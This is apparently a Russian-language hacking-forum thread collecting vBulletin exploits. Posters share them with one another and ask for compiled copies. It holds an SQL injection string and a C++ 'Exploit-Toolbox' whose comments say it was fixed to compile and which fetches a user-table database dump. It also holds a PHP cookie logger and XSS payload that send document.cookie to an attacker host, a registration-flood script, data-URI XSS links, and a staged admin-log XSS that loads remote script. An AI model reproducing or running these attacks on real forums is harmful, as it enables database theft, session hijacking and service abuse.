
Уязвимости: vBulletin

vBulletin 2.x SQL injection — the `templatesused` parameter of global.php is concatenated straight into the template lookup query; the payload `'))/*` closes the `IN (...)` list and comments out the rest of the statement. Note that in the query as rendered below the injected quote appears escaped (`'\\\'))/*'`), so the break-out only works where the input is not escaped before reaching the query.
Код:
global.php?templatesused=nn,dd,'))/*
=>
Код:
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*',
'gobutton','timezone','username_loggedout',
'username_loggedin','phpinclude','headinclude',
'header','footer','forumjumpbit','forumjump',
'nav_linkoff','nav_linkon','navbar','nav_joiner',
'pagenav','pagenav_curpage','pagenav_firstlink',
'pagenav_lastlink','pagenav_nextlink','pagenav_pagelink',
'pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid
 
Код:
#include <arpa/inet.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#include <iostream>
#include <string>
using namespace std;

// Menu choice ("1", "2" or "3") read from stdin in main().
string exploit;
// "yes"/"no" answer to the "Use the exploit now?" prompt of option 1.
string answer;
// Declared but never read or written anywhere in this file.
string answer2;
// Socket descriptor for option 1 (stored in a long although socket() returns int).
long s;
sockaddr_in addr;
// Target address typed by the user. Filled with `cin >> IPaddr`, which has no
// length limit, so input longer than 1023 bytes overruns this buffer.
char IPaddr[1024];
/* Request sent by option 1; change the path to match the forum's install/ directory. */
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
// 40 MB static receive buffer. It is zero-initialised as a global, but recv()
// adds no terminating NUL, so a reply that fills it completely makes the
// later printf("%s") run off the end. A single recv() call is used, so the
// dump is normally only the first segment that has arrived.
char stry[41943040];
// Byte count returned by recv() (printed with "%d" although it is a long).
long I;
// State of the hand-rolled IP validator: M = error flag / character count,
// J = dots seen, K = digits in the current octet, L = value of the current octet.
long M, J, K, L;
// Index into IPaddr for the validator. Zero-initialised as a global and never
// incremented inside the validation loop, so the loop never advances past
// IPaddr[0] and every address is rejected as invalid.
int i;

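/*
 * vBulletin 3.5.4 "Exploit-Toolbox": a menu that prints three old public
 * advisories verbatim and, for option 1 only, can issue a single HTTP GET
 * (the request in the global `sget`) to port 80 of a user-supplied IPv4
 * address and dump whatever comes back.
 *
 * Fixes against the original listing:
 *  - string literals that had been wrapped across source lines (the advisory
 *    URL and the register.php POST body) are rejoined so the file compiles;
 *  - `""` inside the printed PHP/HTML was adjacent-literal concatenation in
 *    C++ (the quotes silently vanished from the output); they are now `\"`;
 *  - the hand-rolled IP validator never advanced its index, so every address
 *    was rejected and the network code was unreachable; inet_pton() is used
 *    instead (it also accepts the octet value 255, which the loop refused);
 *  - the address is read into a std::string instead of a fixed char[1024];
 *  - send()/recv() are looped, -1 is treated as an error (the original only
 *    tested for 0), a receive timeout is set, and the reply is written with
 *    its exact length instead of printf("%s") on an unterminated buffer;
 *  - the 40 MB static receive buffer is replaced by a std::string.
 */

// Print the menu banner and return the option the user typed.
static string read_menu_choice()
{
    cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
    cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
    cout << "> Press 1 for Install_path exploit" << endl;
    cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
    cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
    cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
    cout << "> Copyright by PLDsoft.com" << endl;
    cout << "> Number? ";
    string choice;
    cin >> choice;
    cout << endl;
    return choice;
}

// Option 1: the install-path advisory text, printed as in the original.
static void print_install_path_advisory()
{
    cout << " ____________________ " << endl;
    cout << " |---PLDsoft.com------|" << endl;
    cout << " |--------------------|" << endl;
    cout << " |-vbulletin 3.5.4---|" << endl;
    cout << " |install_path exploit|" << endl;
    cout << " |____________________|" << endl;
    cout << "##############################################" << endl;
    cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
    cout << "###############################################" << endl;
    cout << endl;
    cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
    cout << "Remote : Yes" << endl;
    cout << "Critical Level : Dangerous" << endl;
    cout << "############################################" << endl;
    cout << "Affected software description :" << endl;
    cout << endl;
    cout << "Application : vbulletin" << endl;
    cout << "version : latest version [ 3.60 Release 4 ]" << endl;
    cout << "URL : http://www.vbulletin.com" << endl;
    cout << endl;
    cout << "########################################" << endl;
    cout << "Exploit:" << endl;
    cout << endl;
    // Was split across two source lines in the original (unterminated literal).
    cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl;
    cout << endl;
    cout << "when it works, you can download the database..." << endl;
    cout << endl;
    cout << "########################################" << endl;
    cout << "Contact:" << endl;
    cout << "Nick: M4k3" << endl;
    cout << "E-mail: m4k3 (at) pldsoft (dot) com [email concealed]" << endl;
    cout << "Website: http://www.pldsoft.com" << endl;
    cout << "_______End of Exploit______" << endl;
    cout << endl;
}

// Write all of buf[0..len) to sock, retrying on short writes.
// Returns false on any send() error (the original only checked for 0).
static bool send_all(int sock, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = send(sock, buf, len, 0);
        if (n <= 0) {
            return false;
        }
        buf += n;
        len -= (size_t) n;
    }
    return true;
}

// Read from sock until the peer closes (the request carries
// "Connection: Close") or the receive timeout fires. Returns false on a
// recv() error or when nothing at all was received, matching the original's
// "Not able to receive packets" case.
static bool recv_all(int sock, string &out)
{
    char chunk[4096];
    for (;;) {
        ssize_t n = recv(sock, chunk, sizeof(chunk), 0);
        if (n < 0) {
            return false;
        }
        if (n == 0) {
            break;
        }
        out.append(chunk, (size_t) n);
    }
    return !out.empty();
}

// Option 1: prompt for an IPv4 address, send `sget` to port 80 and print the
// raw reply. Exit codes as in the original: 0 ok / invalid address,
// 1 socket or connect failure, 2 send failure, 3 receive failure.
static int run_install_path_exploit()
{
    cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
    cout << "Insert IP: ";
    string ip;
    cin >> ip;

    sockaddr_in target;
    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(80);
    // Strict dotted-quad parse; rejects anything inet_aton() would have
    // silently accepted in short form ("1", "1.2", ...).
    if (inet_pton(AF_INET, ip.c_str(), &target.sin_addr) != 1) {
        cout << "> Invalid IP-Address!" << endl;
        return 0;
    }

    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("Failure: socket()");
        return 1;
    }
    // Without this a server that never closes the connection would block
    // recv_all() forever.
    struct timeval tv;
    tv.tv_sec = 30;
    tv.tv_usec = 0;
    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));

    if (connect(sock, (sockaddr *) &target, sizeof(target)) != 0) {
        printf("Failure: Connection Rested!\r\n");
        close(sock);
        return 1;
    }
    if (!send_all(sock, sget, strlen(sget))) {
        printf("Failure: Not able to send packets!\r\n");
        close(sock);
        return 2;
    }
    string reply;
    if (!recv_all(sock, reply)) {
        printf("Failure: Not able to receive packets!\r\n");
        close(sock);
        return 3;
    }
    close(sock);

    printf("Packets received succesfully!\r\nBytes of received Data: %lu\r\n",
           (unsigned long) reply.size());
    // Exact-length write: the reply is untrusted and need not be NUL-free.
    fwrite(reply.data(), 1, reply.size(), stdout);
    return 0;
}

// Option 2: cookie-logging PHP script plus the onmouseover payload, printed
// as in the original but with the intended double quotes restored.
static void print_xss_advisory()
{
    cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )" << endl;
    cout << "=> Author: SpiderZ" << endl;
    cout << "=> Sito: www.spiderz.tk" << endl;
    cout << endl;
    cout << "_____________________________________________________________" << endl;
    cout << endl;
    cout << "( 1 )" << endl;
    cout << endl;
    cout << "<?php" << endl;
    cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; " << endl;
    cout << "if(!empty($ip_adresse)) " << endl;
    cout << "{ " << endl;
    cout << "echo 'il tuo ip ?: ',$ip_adresse; " << endl;
    cout << "} " << endl;
    cout << "else " << endl;
    cout << "{ " << endl;
    cout << "echo 'Impossible d\\'afficher l\\'IP'; " << endl;
    cout << "} " << endl;
    cout << "?> " << endl;
    cout << endl;
    cout << "<a href=\"log.php\"></a><?" << endl;
    cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];" << endl;
    cout << "$day = date(\"d\",time()); $month = date(\"m\",time()); $year = date(\"Y\",time());" << endl;
    cout << "if ($REMOTE_HOST == \"\") $visitor_info = $REMOTE_ADDR;" << endl;
    cout << "else $visitor_info = $REMOTE_HOST;" << endl;
    cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;" << endl;
    cout << "$x1=`host $REMOTE_ADDR|grep Name`;" << endl;
    cout << "$x2=$REMOTE_PORT;" << endl;
    cout << "?>" << endl;
    cout << endl;
    cout << "<?php" << endl;
    cout << "$cookie = $_GET['c'];" << endl;
    cout << "?>" << endl;
    cout << endl;
    cout << "<?php" << endl;
    cout << "$myemail = \"YOUR ADDRESS E-MAIL\";" << endl;
    cout << "$today = date(\"l, F j, Y, g:i a\");" << endl;
    cout << "$subject = \"Xss Vbulletin\";" << endl;
    cout << "$message = \"Xss: Hacking\"" << endl;
    cout << "Ip: $ip_adresse " << endl;
    cout << "Cookie: $cookie" << endl;
    cout << "Url: $base" << endl;
    cout << "porta usata: $xx1" << endl;
    cout << "remote port: $x2" << endl;
    cout << "Giorno & Ora : $today \n" << endl;
    cout << endl;
    cout << "$from = \"From: $myemail\\r\\n\";" << endl;
    cout << "mail($myemail, $subject, $message, $from);" << endl;
    cout << "?>" << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << "<?php" << endl;
    cout << "$myemail = \"YOUR ADDRESS E-MAIL\";" << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << "( 2 )" << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << "Name file: image.gif" << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << endl;
    cout << "<pre a='>' onmouseover='document.location=\"http://YOUR ADDRESS WEB.com/exploit.php?\" " << endl;
    cout << "c=\"+document.cookie' b='</pre' >\"" << endl;
    cout << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << "location=\"http://YOUR ADDRESS WEB.com\"" << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << endl;
    cout << "( 3 )" << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << "Like Using" << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << "1 new thread" << endl;
    cout << "2 <a href=\"http://YOUR ADDRESS WEB.com/IMAGE.GIF\" target=\"_blank\">BEAUTIFUL GIRL</a>'" << endl;
    cout << "3 Submit" << endl;
    cout << "4 It waits for" << endl;
    cout << endl;
    cout << "--------------------------------------------------------------------" << endl;
    cout << endl;
    cout << endl;
    cout << "# www.spiderz.tk " << endl;
    cout << endl;
    cout << "_______End of Exploit______" << endl;
}

// Option 3: the register.php flood script, printed as in the original.
static void print_flood_advisory()
{
    cout << "Script : vBulletin Version 3.5.4" << endl;
    cout << endl;
    cout << "site : www.vbulletin.com" << endl;
    cout << endl;
    cout << "Exploit by : x-boy" << endl;
    cout << endl;
    cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl;
    cout << endl;
    cout << "Type : Registration flood in register.php" << endl;
    cout << endl;
    cout << "Thanks to : Simo64" << endl;
    cout << endl;
    cout << endl;
    cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl;
    cout << endl;
    cout << "cURL Must be activated (http://curl.haxx.se)" << endl;
    cout << endl;
    cout << "Sorry for my bad English :-)" << endl;
    cout << endl;
    cout << endl;
    cout << "<?" << endl;
    cout << endl;
    cout << "set_time_limit(60);" << endl;
    cout << endl;
    cout << "//You can change 10 to other numbers" << endl;
    cout << endl;
    cout << "for($i = 1; $i <= 10; $i++)" << endl;
    cout << endl;
    cout << "{" << endl;
    cout << endl;
    cout << "//to put curl to send POST request" << endl;
    cout << endl;
    cout << "$ch = curl_init();" << endl;
    cout << endl;
    cout << "//change http://localhost/vb3 to the url of the script" << endl;
    cout << endl;
    cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl;
    cout << endl;
    cout << "curl_setopt($ch , CURLOPT_POST , 1);" << endl;
    cout << endl;
    cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl;
    // The POST body is one PHP string literal; the original printed it in
    // hard-wrapped pieces (and two of those pieces were unterminated C++
    // literals), which would have put newlines inside the PHP string.
    cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5"
            "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password"
            "confirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm"
            "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST"
            "corrections always on&options[showemail]=1');" << endl;
    cout << endl;
    cout << "curl_exec($ch);" << endl;
    cout << endl;
    cout << "curl_close($ch);" << endl;
    cout << endl;
    cout << "}" << endl;
    cout << endl;
    cout << "//Flood finished good luck" << endl;
    cout << endl;
    cout << "?>" << endl;
    cout << endl;
    cout << "____End of Exploit___" << endl;
}

// Entry point: dispatch on the menu choice. As in the original, running
// option 1 returns its status directly without printing the footer.
int main()
{
    const string choice = read_menu_choice();

    if (choice == "1") {
        print_install_path_advisory();
        sleep(1);
        cout << "Use the exploit now?" << endl;
        cout << "yes/no: ";
        string answer;
        cin >> answer;
        if (answer == "yes") {
            return run_install_path_exploit();
        }
    } else if (choice == "2") {
        print_xss_advisory();
    } else if (choice == "3") {
        print_flood_advisory();
    } else {
        cout << "File not found / Failed to open file" << endl;
    }

    cout << endl;
    cout << endl;
    cout << endl;
    cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl;
    cout << "Contact m4k3@pldsecurity[dot]de" << endl;
    return 0;
}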
1. "Flaw" only affects pirated copies that have intentionally removed some security features. Nothing we can really do here when this happens

2. This is an Internet Explorer bug, fixed for well over a year, in which GIF files would be parsed as HTML; it is not a vBulletin flaw.

3. Versions >= 3.6.0 by default have anti-robot registering enabled, all previous versions had to enable this manually.
 
Чет нифига не смог скомпилить... :(((

Ошибки какие-то наикривейшие прут... На .o файлы ссылаются... С фига бы... :(
 
...ну не компилиться понятное дело - паблик сплойт, так и должно быть, а вообще это сборка из трех эксплойтов и первый из них давно здесь - Winux даже видео снял(когда не удалена папка инсталл на версии 3.5.4)...
...кстати, бага очень актуальна...
 
[br], выложи где-то скомпиленный файл пожалуйста. (линк в пм :))
 
выложи где-то скомпиленный файл пожалуйста
...да тут и компилить не надо - каждый из сплойтов можно выдрать поотдельности...

1: http://www.site.net/forum/install/upgrade.php?step=somesite.net (ссылка была обрезана форумом; в step подставляется любое значение из букв, см. текст сплоита выше)
...работает на нуленых движках - можно задампить sql базу...
...остальные сплойты сам выдерешь :) ...
 
XSS в 3.7.1 и 3.6.10 — параметр `redirect` в admincp/ и modcp/ принимает `data:` URI; base64 ниже декодируется в `<script>alert('aka Great')</script>`

http://[website]/[vB3]/[admincp]/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWthIEdyZWF0Jyk8L3NjcmlwdD4=

http://[website]/[vB3]/[modcp]/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWthIEdyZWF0Jyk8L3NjcmlwdD4=

XSS в хаке vBanonymizer (v 2.7) — тот же приём: redirector.php передаёт `url` в перенаправление без проверки схемы

http://[website]/redirector.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWthIEdyZWF0Jyk8L3NjcmlwdD4=
 
XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

http://securityvulns.ru/Udocument137.html

Уязвимость существует из-за недостаточной обработки параметров "PHP_SELF" и "do" при запросе несуществующей страницы: оба значения попадают в admin-лог и выводятся в adminlog.php без экранирования.

Exploit:

1) Записываем нашу XSS в admin-лог vBulletin: каждый <img> ниже заставляет браузер сделать один запрос к admincp/faq.php, а суффикс пути (/0, /1, ...) задаёт порядок записей в логе.

Код:
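<html> <body>
<!--
  Every <img> below makes the browser issue one GET to admincp/faq.php.
  The path suffix (/0 .. /a0) lands in PHP_SELF and fixes the order of the
  log entries; the "do" value (at most 20 characters per entry) carries one
  fragment of the script.  The fragments are wrapped in /* ... */ so that
  each log row is harmless on its own and only the concatenation h = a+...+g,
  passed to eval(), becomes <script src=http://HOST/t.js></script> written
  via document.write.  "localhost/vB/upload" is the target forum path and
  the entries marked below hold the attacker host; replace both.
  ("faq. php" in the original paste was forum auto-spacing of "faq.php".)
-->
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script '/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*" />
<!-- edit to match your data: host of the t.js you serve; e is a spare slot -->
<img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*" />
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
</body> </html>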

2) Затем отправьте админа по ссылке:

/adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1


Ограничения (именно поэтому полезная нагрузка разбита на фрагменты и собирается через eval):

PHP_SELF — не более 50 символов и без слэшей
$_REQUEST['do'] — не более 20 символов на одну запись

Также сообщается, что злоумышленник может внедрить и выполнить произвольный PHP код на системе с привилегиями Web сервера.
 

